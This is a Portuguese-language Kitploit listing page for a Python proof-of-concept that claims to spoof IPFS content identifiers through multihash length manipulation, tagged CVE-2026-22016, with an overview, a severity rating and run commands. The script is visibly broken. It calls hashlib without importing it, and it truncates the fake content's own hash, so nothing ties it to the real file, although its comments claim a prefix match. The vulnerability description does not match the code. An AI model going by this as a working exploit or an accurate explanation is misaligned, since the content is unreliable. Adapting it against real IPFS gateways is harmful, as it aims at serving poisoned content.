Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Prova de conceito em Python demonstrando spoofing de CID do IPFS via extensão de comprimento de multihash, destacando falhas de verificação de endereçamento por conteúdo que podem envenenar gateways IPFS. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
Análise de VulnerabilidadesExploraçãoAnálise de HashSegurança WebCriptografiaAtaque Adversário
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Prova de conceito em Python demonstrando spoofing de CID do IPFS via extensão de comprimento de multihash, destacando falhas de verificação de endereçamento por conteúdo que podem envenenar gateways IPFS.

Ver Repositório
8há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22016 – Spoofing de CID IPFS via Extensão de Comprimento Multihash

Código do Programa (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Spoofing de CID IPFS via Extensão de Comprimento Multihash

Severity: High

Visão Geral

Uma implementação do IPFS confia no campo de comprimento no multihash de um CID sem verificar se o hash em si corresponde ao conteúdo completo. Um atacante pode criar um arquivo cujo hash truncado seja igual ao prefixo do hash de um arquivo legítimo e servir o arquivo malicioso sob o mesmo CID.

Detalhes da Vulnerabilidade

  • Tipo: Spoofing de Conteúdo
  • Impacto: Servir conteúdo malicioso, envenenando gateways IPFS.
  • Causa raiz: A verificação do CID não confere se o comprimento do digest corresponde à saída esperada da função hash.

Demonstração do Exploit

Execute o script:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

Ele mostra que um CID falsificado pode ser gerado.

Baixar ferramenta